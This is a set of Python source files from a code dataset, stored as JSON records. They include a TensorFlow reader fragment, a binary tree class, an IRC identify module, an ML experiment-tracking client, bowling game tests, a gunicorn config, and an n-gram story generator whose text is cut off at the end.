reader_class(**reader_kwargs).read(filename_queue)\n\n\ndef get_data_files(data_sources):\n \"\"\"Get data_files from data_sources.\n\n Args:\n data_sources: a list/tuple of files or the location of the data, i.e.\n /path/to/train@128, /path/to/train* or /tmp/.../train*\n\n Returns:\n a list of data_files.\n\n Raises:\n ValueError: if not data files are not found\n\n \"\"\"\n if isinstance(data_sources, (list, tuple)):\n data_files = []\n for source in data_sources:\n data_files += get_data_files(source)\n else:\n if '*' in data_sources or '?' in data_sources or '[' in data_sources:\n data_files = gfile.Glob(data_sources)\n else:\n data_files = [data_sources]\n if not data_files:\n raise ValueError('No data files found in %s' % (data_sources,))\n return data_files\n","sub_path":"Keras_tensorflow/source/tensorflow/contrib/slim/python/slim/data/parallel_reader.py","file_name":"parallel_reader.py","file_ext":"py","file_size_in_byte":10492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650500118","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\spacecomponents\\client\\components\\siphon.py\nfrom dogma.attributes.format import GetFormatAndValue\nimport evetypes\n__author__ = 'markus'\nfrom spacecomponents.client.display import EntryData, RANGE_ICON\nfrom spacecomponents.common.components.component import Component\n\nclass Siphon(Component):\n\n @staticmethod\n def GetAttributeInfo(godmaService, typeID, attributes, instance, localization):\n attributeEntries = [\n EntryData('Header', localization.GetByLabel('UI/Inflight/SpaceComponents/Siphon/SiphoningMaterials'))]\n materialNames = []\n for materialID in attributes.materials:\n materialNames.append((evetypes.GetName(materialID), materialID))\n\n for material in sorted(materialNames):\n attributeEntries.append(EntryData('LabelTextSides', material[0], '', evetypes.GetIconID(material[1]), material[1]))\n\n return attributeEntries","sub_path":"client/spacecomponents/client/components/siphon.py","file_name":"siphon.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"55519774","text":"# Objet Arbre\n\nclass Arbre:\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n def insert(self, data):\n if data < self.data:\n if self.left is None:\n self.left = Arbre(data)\n self.left.parent = self\n else:\n self.left.insert(data)\n elif data > self.data:\n if self.right is None:\n self.right = Arbre(data)\n self.right.parent = self\n else:\n self.right.insert(data)\n\n def pprint(self, level=0):\n if self.right:\n self.right.pprint(level + 1)\n print(f\"{' ' * 4 * level}{self.data}\")\n if self.left:\n self.left.pprint(level + 1)\n\n def count_children(self):\n return bool(self.left) + bool(self.right)\n\n def is_left_child(self):\n return self.parent and self is self.parent.left\n\n def is_right_child(self):\n return self.parent and self is self.parent.right\n\n def delete(self, data):\n\n arbre = self.get(data)\n\n if not arbre:\n return\n\n children_count = arbre.count_children()\n\n if children_count == 0:\n if arbre.is_left_child():\n arbre.parent.left = None\n else:\n arbre.parent.right = None\n del arbre\n\n elif children_count == 1:\n child = arbre.left or arbre.right\n if arbre.is_left_child():\n arbre.parent.left = child\n child.parent = arbre.parent\n del arbre\n elif arbre.is_right_child():\n arbre.parent.right = child\n child.parent = arbre.parent\n del arbre\n else:\n root = arbre\n root.data = child.data\n root.left = child.left\n root.right = child.right\n if child.left:\n child.left.parent = root\n if child.right:\n child.right.parent = root\n del child\n\n else:\n succ = arbre.get_successor()\n arbre.data = succ.data\n if succ.is_left_child():\n succ.parent.left = succ.right\n else:\n succ.parent.right = succ.right\n if succ.right:\n succ.right.parent = succ.parent\n del succ\n\n# Getters\n\n def get(self, data):\n if data < self.data:\n return self.left.get(data) if self.left else None\n elif data > self.data:\n return self.right.get(data) if self.right else None\n return self\n\n def getMin(self):\n arbre = self\n while arbre.left:\n arbre = arbre.left\n return arbre\n\n def getMax(self):\n arbre = self\n while arbre.right:\n arbre = arbre.right\n return arbre\n\n def get_height(self):\n return 1 + max(\n self.left.get_height() if self.left else -1,\n self.right.get_height() if self.right else -1\n )\n\n def get_successor(self):\n if self.right:\n return self.right.min()\n arbre = self\n while arbre.is_right_child():\n arbre = arbre.parent\n return arbre.parent\n\n def get_predecessor(self):\n if self.left:\n return self.left.max()\n arbre = self\n while arbre.is_left_child():\n arbre = arbre.parent\n return arbre.parent\n\n def getData(self):\n return self.data","sub_path":"arbre.py","file_name":"arbre.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"452578512","text":"from django import template\nfrom django.http import QueryDict\n\nregister = template.Library()\n\n@register.filter\ndef replace(value, args):\n qs = QueryDict(args)\n if qs.has_key('old') and qs.has_key('newValue'):\n return value.replace(qs['old'], qs['newValue'])\n else:\n return value\n","sub_path":"game/templatetags/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346444738","text":"from twisted.plugin import IPlugin\nfrom twisted.words.protocols import irc\nfrom txircd.module_interface import Command, ICommand, IModuleData, ModuleData\nfrom zope.interface import implementer\nfrom typing import Any, Dict, List, Optional, Tuple, Union\n\nirc.ERR_SERVICES = \"955\" # Custom numeric; 955 \n\n@implementer(IPlugin, IModuleData)\nclass AccountIdentify(ModuleData):\n\tname = \"AccountIdentify\"\n\t\n\tdef userCommands(self) -> List[Tuple[str, int, Command]]:\n\t\treturn [ (\"IDENTIFY\", 1, IdentifyCommand(self)),\n\t\t\t(\"ID\", 1, IdCommand(self)) ]\n\t\n\tdef parseParams(self, command: str, user: \"IRCUser\", params: List[str], prefix: str, tags: Dict[str, Optional[str]]) -> Optional[Dict[Any, Any]]:\n\t\tif not params:\n\t\t\tuser.sendSingleError(\"IdentifyParams\", irc.ERR_NEEDMOREPARAMS, command, \"Not enough parameters\")\n\t\t\treturn None\n\t\tif len(params) == 1:\n\t\t\treturn {\n\t\t\t\t\"password\": params[0]\n\t\t\t}\n\t\treturn {\n\t\t\t\"accountname\": params[0],\n\t\t\t\"password\": params[1]\n\t\t}\n\t\n\tdef execute(self, user: \"IRCUser\", data: Dict[Any, Any]) -> bool:\n\t\tif \"accountname\" in data:\n\t\t\taccountName = data[\"accountname\"]\n\t\telse:\n\t\t\taccountName = self.ircd.runActionUntilValue(\"accountfromnick\", user.nick)\n\t\t\tif not accountName:\n\t\t\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"IDENTIFY\", \"NOTEXIST\")\n\t\t\t\tuser.sendMessage(\"NOTICE\", \"No account could be found associated with your nickname.\")\n\t\t\t\treturn True\n\t\tresultValue = self.ircd.runActionUntilValue(\"accountauthenticate\", user, accountName, data[\"password\"])\n\t\tif not resultValue:\n\t\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"IDENTIFY\", \"NOACCOUNT\")\n\t\t\tuser.sendMessage(\"NOTICE\", \"This server doesn't have accounts set up.\")\n\t\t\treturn True\n\t\tif resultValue[0] is None:\n\t\t\tresultValue[1].addCallback(self.checkAuthSuccess, user)\n\t\t\treturn True\n\t\tif resultValue[0]:\n\t\t\treturn True\n\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"IDENTIFY\", resultValue[1])\n\t\tuser.sendMessage(\"NOTICE\", resultValue[2])\n\t\treturn True\n\t\n\tdef checkAuthSuccess(self, result: Union[Tuple[bool, Optional[str], Optional[str]], Tuple[None, \"Deferred\", None]], user: \"IRCUser\") -> None:\n\t\tif user.uuid not in self.ircd.users:\n\t\t\treturn\n\t\tloginSuccess, errorCode, errorMessage = result\n\t\tif loginSuccess:\n\t\t\treturn\n\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"IDENTITY\", errorCode)\n\t\tuser.sendMessage(\"NOTICE\", errorMessage)\n\n@implementer(ICommand)\nclass IdentifyCommand(Command):\n\tdef __init__(self, module):\n\t\tself.module = module\n\t\n\tdef parseParams(self, user: \"IRCUser\", params: List[str], prefix: str, tags: Dict[str, Optional[str]]) -> Optional[Dict[Any, Any]]:\n\t\treturn self.module.parseParams(\"IDENTIFY\", user, params, prefix, tags)\n\t\n\tdef execute(self, user: \"IRCUser\", data: Dict[Any, Any]) -> bool:\n\t\treturn self.module.execute(user, data)\n\n@implementer(ICommand)\nclass IdCommand(Command):\n\tdef __init__(self, module):\n\t\tself.module = module\n\t\n\tdef parseParams(self, user: \"IRCUser\", params: List[str], prefix: str, tags: Dict[str, Optional[str]]) -> Optional[Dict[Any, Any]]:\n\t\treturn self.module.parseParams(\"ID\", user, params, prefix, tags)\n\t\n\tdef execute(self, user: \"IRCUser\", data: Dict[Any, Any]) -> bool:\n\t\treturn self.module.execute(user, data)\n\nidentifyCommand = AccountIdentify()","sub_path":"txircd/modules/extra/services/account_identify.py","file_name":"account_identify.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359710518","text":"import requests\nimport urllib\nimport json\nfrom datetime import datetime\nfrom .utils import dict2obj, NpEncoder\nfrom .telegram import TelegramStats\nPROJECT_ROOT = '/project'\n\nclass Analytics():\n\n def __init__(self, host='127.0.0.1', port=80, telegram_secret_key=None, telegram_group_key=None):\n '''\n host: static ip to your server\n telegram_secret_key: secret key to access your telegram bot\n telegram group_key : group id key\n '''\n self.telebot = None\n if telegram_secret_key and telegram_group_key:\n self.telebot = TelegramStats(secret_key=telegram_secret_key, group_key=telegram_group_key)\n \n if port != 80:\n self.target_url = 'http://' + host + ':' + str(port)\n else:\n self.target_url = 'http://' + host\n res = requests.get(self.target_url+'/ping')\n self.latest_project_id = None\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to reach server')\n\n def check_connection(self):\n res = requests.get(self.target_url+'/ping')\n self.latest_project_id = None\n if res.status_code != requests.codes.ok:\n return False\n return True\n \n def create_project(self, name, description, search_space=None):\n res = requests.get(self.target_url+'/project/'+str(name))\n if res.status_code != requests.codes.ok:\n data = {\n 'name': name,\n 'description': description,\n }\n if search_space is not None and isinstance(search_space, dict):\n data['search_space'] = search_space\n \n res = requests.post(self.target_url+'/project', data=json.dumps(data, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to create project : %s' % res.text)\n project = res.json()\n self.latest_project_id = project['id']\n return project, True\n self.latest_project_id = res.json()['id']\n return dict2obj(res.json()), False\n\n def project(self, project_id=None):\n if project_id is None:\n if self.latest_project_id is None:\n raise ValueError('Project ID should be provided')\n project_id = self.latest_project_id\n url = '{}/project/{}'.format(self.target_url, project_id)\n res = requests.get(url)\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to retrieve project : %s '% res.text)\n trial = res.json()\n return dict2obj(trial)\n\n def list_project(self):\n res = requests.get(self.target_url+'/project')\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to list project: Network error')\n raw_projects = res.json()\n if raw_projects['count'] > 0:\n return [ dict2obj(p) for p in raw_projects['projects'] ]\n return []\n\n def get_hyperopt_params(self, project_name):\n url = '{}/project/{}/hyperopt'.format(self.target_url , project_name)\n res = requests.get(url)\n if res.status_code != requests.codes.ok:\n return None\n trial = res.json()\n if trial['is_assigned'] and 'status' not in trial:\n return dict2obj(trial)\n else:\n return None\n\n def update_hyperopt_results(self, project_name, trial_id, results):\n '''results\n\n '''\n if 'total_acc' not in results:\n raise ValueError('Must have total_acc attribute')\n\n payload = results\n if len(payload) == 0:\n return None\n\n url = '{}/project/{}/hyperopt/{}'.format(self.target_url , project_name , trial_id)\n res = requests.post(url, data=json.dumps(payload, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n\n if res.status_code != requests.codes.ok:\n return None\n trial = res.json()\n if self.telebot is not None:\n self.telebot.send_msg('Trial {} updated'.format(trial['updated']['name']))\n if 'status' not in trial:\n return dict2obj(trial)\n else:\n return None\n\n def create_trial(self, name, params, description=None, project_id=None, n_fold=None, results=None, machine='default', data_metadata=None ):\n if project_id is None:\n if self.latest_project_id is None:\n raise ValueError('Project ID should be provided')\n project_id = self.latest_project_id\n\n payload = {\n 'name': name,\n 'params': params,\n }\n if description:\n payload['description'] = description\n if n_fold is not None:\n payload['n_fold'] = n_fold\n if results:\n payload['results'] = results\n if machine:\n payload['machine'] = machine\n if data_metadata:\n payload['data_metadata'] = data_metadata\n\n url = '{}/project/{}/trial'.format(self.target_url, project_id)\n res = requests.post(url, data=json.dumps(payload, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to create a new trial %s' % res.text)\n trial = res.json()\n if self.telebot is not None:\n self.telebot.send_msg('Trial {} created, this is the {} nth fold'.format(trial['name'], trial['n_fold']))\n return dict2obj(trial)\n \n def from_args(self, name, args, description=None, project_id=None, machine=None, n_fold=None, data_metadata=None):\n if description is None:\n description = 'Trial run at {}'.format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\"))\n params = vars(args)\n return self.create_trial(name, params, description=description, project_id=project_id, n_fold=n_fold, data_metadata=data_metadata )\n\n def get_trial(self, trial_id, project_id=None):\n if project_id is None:\n if self.latest_project_id is None:\n raise ValueError('Project ID should be provided')\n project_id = self.latest_project_id\n url = '{}/project/{}/trial/{}'.format(self.target_url , project_id , trial_id)\n res = requests.post(url, data=json.dumps(payload, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n\n def update_trial(self, trial_id, params=None,project_id=None, n_fold=None, results=None, data_metadata=None):\n '''\n return : return updated instance if trial_id is found, else return a None type\n '''\n if project_id is None:\n if self.latest_project_id is None:\n raise ValueError('Project ID should be provided')\n project_id = self.latest_project_id\n payload = {}\n if params is not None:\n payload['params'] = params\n if n_fold is not None:\n payload['n_fold'] = n_fold\n if results is not None:\n payload['results'] = results\n if data_metadata is not None:\n payload['data_metadata'] = data_metadata\n if len(payload) == 0:\n return None\n\n url = '{}/project/{}/trial/{}'.format(self.target_url , project_id , trial_id)\n res = requests.post(url, data=json.dumps(payload, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to update trial %s' % res.text)\n trial = res.json()\n if self.telebot is not None:\n self.telebot.send_msg('Trial {} updated'.format(trial['updated']['name']))\n if trial['update'] > 0:\n return dict2obj(trial['updated'])\n else:\n return None","sub_path":"dlanalytics/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"277518744","text":"__author__ = 'jim.graf'\n\nimport logging\nimport Queue\n\nclass Consumer:\n\n def __init__(self, target=None, log_queue=None):\n self.target = target\n self.log_queue = log_queue\n\n def consume(self, item):\n try:\n self.log_queue.put(item=\"Consuming {item}\".format(item=item), block=True, timeout=60)\n except Queue.full:\n logging.fatal(\"Unable to write to logging queue\")\n exit(1)","sub_path":"examples/mytest/Consumer.py","file_name":"Consumer.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439087395","text":"#!/usr/bin/env python3\n\n# Mainumby: Parsing and translation with minimal dependency grammars.\n#\n########################################################################\n#\n# This file is part of the HLTDI L^3 project\n# for parsing, generation, translation, and computer-assisted\n# human translation.\n#\n# Copyleft 2014, 2015, 2016, 2017, 2018; HLTDI, PLoGS \n# \n# This program is free software: you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation, either version 3 of\n# the License, or (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# =========================================================================\n\n# 2017.4\n# -- English->Amharic\n# -- Split off from mainumby as miTmiTa.py\n\n__version__ = 1.0\n\nimport iwqet\n\n## shortcuts\n\ndef load(train=False):\n eng, amh = iwqet.load('eng', 'amh')\n return eng, amh\n\ndef document(text, process=True):\n e = iwqet.Language.languages.get('eng')\n a = iwqet.Language.languages.get('amh')\n if not e:\n e, a = load()\n# e = load1()\n d = iwqet.Document(e, a, text=text, proc=process)\n return d\n\ndef sentence(sentence, ambig=False, solve=True, user=None, segment=True,\n max_sols=1, verbosity=0):\n e, a = load()\n session = iwqet.start(e, a, user)\n d = iwqet.Document(e, a, sentence, True, session=session)\n s = d[0]\n s.initialize(ambig=ambig, verbosity=verbosity)\n if solve or segment:\n s.solve(all_sols=ambig or max_sols>1, max_sols=max_sols)\n if s.solutions and segment:\n solution = s.solutions[0]\n solution.get_segs()\n output_sols(s)\n return s\n\ndef generate(language, stem, feats=None, pos='v'):\n if not feats:\n feats = iwqet.FeatStruct(\"[]\")\n else:\n feats = iwqet.FeatStruct(feats)\n return language.generate(stem, feats, pos)\n\ndef solve1(sentence):\n \"\"\"Solve; print and return solutions.\"\"\"\n sentence.solve()\n output_sols(sentence)\n return sentence.solutions\n\ndef load1(lang='eng'):\n l = iwqet.Language.load_lang(lang)\n return l\n\ndef output_sols(sentence):\n \"\"\"Show target outputs for all solutions for sentence.\"\"\"\n for sol in sentence.solutions:\n print(sol.get_ttrans_outputs())\n\ndef arch_doc(lengua, ruta, session=None, user=None, proc=False):\n \"\"\"Crear un documento del contenido de un archivo, solo para análisis.\"\"\"\n l = cargar(lengua)\n session = session or iwqet.start(l, None, user)\n arch = open(ruta, encoding='utf8')\n texto = arch.read()\n d = iwqet.Document(l, None, texto, proc=proc, session=session)\n return d\n\ndef usuario(username):\n return iwqet.User.users.get(username)\n\n# Load a language for analysis.\ndef load_lang(lang='eng'):\n eng = iwqet.Language.load_lang(lang)\n return eng\n\nif __name__ == \"__main__\":\n print(\"ወደ ሚጥሚጣ እንኳን ደህና መጡ! version {}\\n\".format(__version__))\n","sub_path":"miTmiTa.py","file_name":"miTmiTa.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"23230731","text":"import math\r\nimport sys\r\n\r\nword = input()\r\n\r\nlist_of_vowels = ['a', 'e', 'i', 'o','u', 'y', 'A', 'E', 'O', 'Y', 'U', 'I']\r\nsum = 0\r\nmax_sum = -sys.maxsize\r\npowerful_word = ''\r\n\r\nwhile word != \"End of words\":\r\n for letter in word:\r\n sum += ord(letter)\r\n\r\n if word[0] in list_of_vowels:\r\n sum = sum * len(word)\r\n elif word[0] not in list_of_vowels:\r\n sum = math.floor(sum / len(word))\r\n\r\n if sum > max_sum:\r\n max_sum = sum\r\n powerful_word = word\r\n\r\n sum = 0\r\n\r\n word = input()\r\n\r\nif word == \"End of words\":\r\n print(f'The most powerful word is {powerful_word} - {max_sum}')","sub_path":"exam_july_2019/the_most_powerful_word.py","file_name":"the_most_powerful_word.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"235739349","text":"from django.test import TestCase\nfrom bowling.logic.views import get_context, get_template\n\n\nclass TestViews(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.template_data = [\n {'game_id': 1, 'expected': 'game.html'},\n {'game_id': 'create', 'expected': 'game.html'},\n {'game_id': None, 'expected': 'base.html'}\n ]\n cls.context_data = [\n {\n 'game_id': 'create',\n 'pins_hit': None,\n 'expected': {\n 'rolls': ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', ''],\n 'rolls_remaining': 2,\n 'available_pins': {\n 0: True, 1: True, 2: True, 3: True, 4: True, 5: True,\n 6: True, 7: True, 8: True, 9: True, 10: True\n }\n }\n },\n {\n 'game_id': 1,\n 'pins_hit': 3,\n 'expected': {\n 'rolls': ['3', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', ''],\n 'rolls_remaining': 1,\n 'available_pins': {\n 0: True, 1: True, 2: True, 3: True, 4: True, 5: True,\n 6: True, 7: True, 8: False, 9: False, 10: False\n }\n }\n }\n ]\n\n def test_get_template_returns_appropriate_template(self):\n for data in self.template_data:\n actual = get_template(data['game_id'])\n self.assertEqual(\n actual,\n data['expected']\n )\n\n def test_get_context_returns_empty_without_game_id(self):\n actual = get_context(None, 5)\n self.assertEqual(\n actual,\n {}\n )\n\n def test_get_context_returns_appropriate_template(self):\n for data in self.context_data:\n actual = get_context(data['game_id'], data['pins_hit'])\n for key, value in data['expected'].items():\n self.assertEqual(\n actual[key],\n value\n )\n\n def test_view_sends_context_and_template_through_render(self):\n for data in self.context_data:\n context = {'game_id': data['game_id']}\n url = '' if context['game_id'] == 'create' else context['game_id']\n if data['pins_hit']:\n context['pins_hit'] = data['pins_hit']\n response = self.client.post('/{}'.format(url), context)\n templates = [t.name for t in response.templates]\n self.assertIn(\n 'game.html',\n templates\n )\n for key, value in data['expected'].items():\n self.assertEqual(\n response.context[key],\n value\n )\n","sub_path":"bowling/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454869139","text":"# SPDX-FileCopyrightText: Copyright (c) 2018-2019 Ministry of Education and Culture, Finland\n#\n# SPDX-License-Identifier: GPL-3.0-or-later\n\n\"\"\"\ngunicorn WSGI server configuration.\n\"\"\"\n\nfrom multiprocessing import cpu_count\nfrom os import environ\n\ndef max_workers():\n return cpu_count() * 2 + 1\n\nmax_requests = 100\nworker_class = 'gevent'\nworkers = max_workers()\ntimeout = 259200 # 3 days\ngraceful_timeout = 60 * 30 # 30 minutes\n\nsecure_scheme_headers = {\n 'X-FORWARDED-PROTOCOL': 'ssl',\n 'X-FORWARDED-PROTO': 'https',\n 'X-FORWARDED-SSL': 'on'\n}\n","sub_path":"metax/gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"138456922","text":"import utilities\r\n\r\ndef parse_story(file_name):\r\n ''' \r\n (str) -> list\r\n Takes a text file and parses the file, breaking text into individual tokens for analysis\r\n Ex. \"The cat went to the sto{re!\" -> [\"the\", \"cat\", \"went\", \"to\", \"the\", sto\", \"re\", \"!\"]\r\n '''\r\n parsing = [] \r\n f = open(file_name, \"r\") \r\n text = f.read().lower()\r\n N = len(text) \r\n # generate token\r\n token = \"\"\r\n for x in range(N):\r\n if text[x] == \" \" and token != \"\": # token ends with space\r\n parsing.append(token)\r\n token = \"\"\r\n if text[x] == \"\\n\" and token != \"\": # token ends with newline\r\n parsing.append(token)\r\n token = \"\" \r\n elif (text[x] != \" \" and text[x] != \"\\n\"): # not white space\r\n last_char, valid_punc, bad_character = 0, 0, 0\r\n for V in utilities.VALID_PUNCTUATION:\r\n if text[x] == V:\r\n valid_punc = 1 \r\n for B in utilities.BAD_CHARS:\r\n if text[x] == B:\r\n bad_character = 1\r\n if x == N-1:\r\n last_char = 1\r\n if valid_punc: \r\n if token != \"\": \r\n parsing.append(token)\r\n token = \"\"\r\n parsing.append(text[x])\r\n elif bad_character:\r\n if token != \"\": \r\n parsing.append(token)\r\n token = \"\" \r\n elif last_char: # last but not punc or bad\r\n token += text[x]\r\n parsing.append(token)\r\n token = \"\"\r\n else: # normal char\r\n token += text[x]\r\n \r\n return parsing\r\n \r\ndef get_prob_from_count(counts): \r\n ''' \r\n (list) -> list\r\n Takes a list of counts and returns the associated list of probabilities \r\n Ex. [40, 60, 50, 30, 20] -> [0.2, 0.3, 0.25, 0.15, 0.1]\r\n ''' \r\n pmf = []\r\n csum = 0\r\n for i in counts: # getting total\r\n csum += i\r\n for i in range(len(counts)):\r\n pmf.append(counts[i]/csum)\r\n return pmf\r\n \r\ndef build_ngram_counts(words, n):\r\n ''' \r\n (list, int) -> dict\r\n Takes a list of tokens and returns a dictionary of N-grams created using those tokens\r\n Ex. [\"the\", \"man\", \"ate\"], 2 -> {(\"the\", \"man\"): [[\"ate\"], [1]]}\r\n ''' \r\n ngrams = {}\r\n for i in range(len(words)-n):\r\n key, counts, newwords = [], [], []\r\n temp = [newwords, counts]\r\n for x in range(n):\r\n key.append(words[i+x])\r\n key = tuple(key)\r\n if key in ngrams:\r\n continue\r\n else: # key not in ngram, need to create it \r\n ngrams[key] = temp\r\n counts.append(1)\r\n newwords.append(words[i+n]) # add the next token after ngram \r\n for k in range(i+1, len(words)-n): # check remainder of dictionary for more occurences \r\n new = [] # create new key\r\n for l in range(n):\r\n new.append(words[k+l])\r\n \r\n if key == tuple(new): # repeat key, thus add to existing list\r\n existing = False\r\n for m in range(len(newwords)):\r\n if words[k+n] == newwords[m]: # repeat word \r\n counts[m] += 1\r\n existing = True\r\n if existing:\r\n continue\r\n else: # word needs to be added to key\r\n counts.append(1)\r\n newwords.append(words[k+n]) \r\n return ngrams\r\n \r\ndef prune_ngram_counts(counts, prune_len):\r\n ''' \r\n (dict, int) -> dict\r\n Takes a dictionary of n-grams and prunes it, keeping only the k most frequent words where k is the second parameter\r\n Ex. {(\"i\", \"will\"): [[\"go\", \"leave\"], [2,1]]}, 1 -> {(\"i\", \"will\"): [[\"go\"], [2]]}\r\n ''' \r\n pruned_ngrams = {}\r\n for key in counts: # looping through every tupled key\r\n words, countsl = counts[key][0], counts[key][1]\r\n for i in range(len(countsl)): # dual bubble sort algorithm\r\n for j in range(len(countsl)-i-1):\r\n if countsl[j] < countsl[j+1]: # reversing bubble sort list\r\n countsl[j], countsl[j+1] = countsl[j+1], countsl[j] \r\n words[j], words[j+1] = words[j+1], words[j]\r\n endList = [prune_len, len(countsl)]\r\n N = min(endList) \r\n boundary = countsl[N-1] # boundary for each key is final element before cut\r\n words2, counts2 = [], [] \r\n tlist = [words2, counts2] \r\n for x in range(len(words)):\r\n if countsl[x] >= boundary: # within pruning boundary\r\n counts2.append(countsl[x])\r\n words2.append(words[x]) \r\n pruned_ngrams[key] = tlist\r\n return pruned_ngrams\r\n \r\ndef probify_ngram_counts(counts):\r\n ''' \r\n (dict) -> dict\r\n Takes a dictionary of n-grams and converts all counts to probabilities \r\n Ex. {(\"i\", \"will\"): [[\"go\", \"leave\"], [2,3]]} -> {(\"i\", \"will\"): [[\"go\", \"leave\"], [0.4, 0.6]]}\r\n ''' \r\n for key in counts: \r\n firstlist = counts[key][1]\r\n newlist = get_prob_from_count(firstlist) # probifies each keys counts list\r\n counts[key][1] = newlist\r\n return counts\r\n \r\ndef build_ngram_model(words, n):\r\n ''' \r\n (list, int) -> dict\r\n Takes a list of words and creates an n-gram model to predict future words \r\n ''' \r\n model = prune_ngram_counts(build_ngram_counts(words, n), 15) # cutting to only the 15 most frequent characters \r\n for key in model:\r\n wordlist = model[key][0]\r\n countslist = model[key][1] \r\n N = len(countslist)\r\n for i in range(N): # dual reverse bubble sort \r\n for j in range(N-i-1):\r\n if countslist[j] < countslist[j+1]:\r\n wordlist[j], wordlist[j+1] = wordlist[j+1], wordlist[j] \r\n countslist[j], countslist[j+1] = countslist[j+1], countslist[j] \r\n model = probify_ngram_counts(model)\r\n return model\r\n \r\ndef gen_bot_list(ngram_model, seed, num_tokens=0):\r\n ''' \r\n (dict, tuple, int) -> list\r\n Generates n tokens of text based on an n-gram model and a seed tuple\r\n Ex. {(\"I\", \"will\"): [[\"Go\"], [1]]}, (\"I\", \"will\"), 3 --> [\"I\", \"will\", \"Go\"]\r\n ''' \r\n botlist = []\r\n for token in seed:\r\n botlist.append(token)\r\n N = len(seed)\r\n if N > num_tokens: # length of seed > number of tokens required \r\n return list(seed[0:num_tokens])\r\n \r\n for x in range(len(seed)-1, num_tokens-1):\r\n if ((botlist[x-1], botlist[x]) not in ngram_model): # the n-gram is not present in the model\r\n break\r\n if len(ngram_model[(botlist[x-1], botlist[x])][0]) == 0: # the n-gram is present but is empty \r\n break\r\n else: # n-gram has some token\r\n ngram = (botlist[x-1], botlist[x])\r\n botlist.append(utilities.gen_next_token(ngram, ngram_model))\r\n return botlist\r\n \r\ndef gen_bot_text(token_list, bad_author):\r\n ''' \r\n (list, bool) -> str\r\n Returns a string of tokens which is formatted according to the skill of the author (bad or good)\r\n Ex. [\"the\", \"fox\", \"jumped\", \".\"], False --> \"The fox jumped.\"\r\n ''' \r\n bot_text = \"\"\r\n N = len(token_list)\r\n if bad_author:\r\n for token in token_list: # just adding each token separated by a space\r\n bot_text += token\r\n bot_text += \" \"\r\n else:\r\n for x in range(N):\r\n token = token_list[x]\r\n first, final, beforeVP, newSent, cap = 0,0,0,0,0 # all weird things to check\r\n if x == 0: \r\n first = True\r\n if x == (N - 1):\r\n final = True\r\n if x != (N-1) and (token_list[x+1] in utilities.VALID_PUNCTUATION):\r\n beforeVP = True\r\n if x != 0 and (token_list[x-1] in utilities.END_OF_SENTENCE_PUNCTUATION):\r\n newSent = True\r\n if token.capitalize() in utilities.ALWAYS_CAPITALIZE:\r\n cap = True\r\n # special cases\r\n if (first and final) or (final and (cap or newSent)):\r\n bot_text += token.capitalize()\r\n elif final or beforeVP:\r\n bot_text += token \r\n elif first or cap or newSent:\r\n bot_text += token.capitalize() \r\n if not beforeVP:\r\n bot_text += \" \" \r\n else: # normal case\r\n bot_text += token + \" \"\r\n \r\n return bot_text\r\n \r\n\r\ndef write_story(file_name, text, title, student_name, author, year):\r\n ''' \r\n (str, str, atr, str, str, int) -> None\r\n Writes a file formatted as to the specifications given in the file, using the information given\r\n ''' \r\n f = open(file_name, \"w+\") # formatting title page \r\n for lines in range(10):\r\n f.write(\"\\n\")\r\n 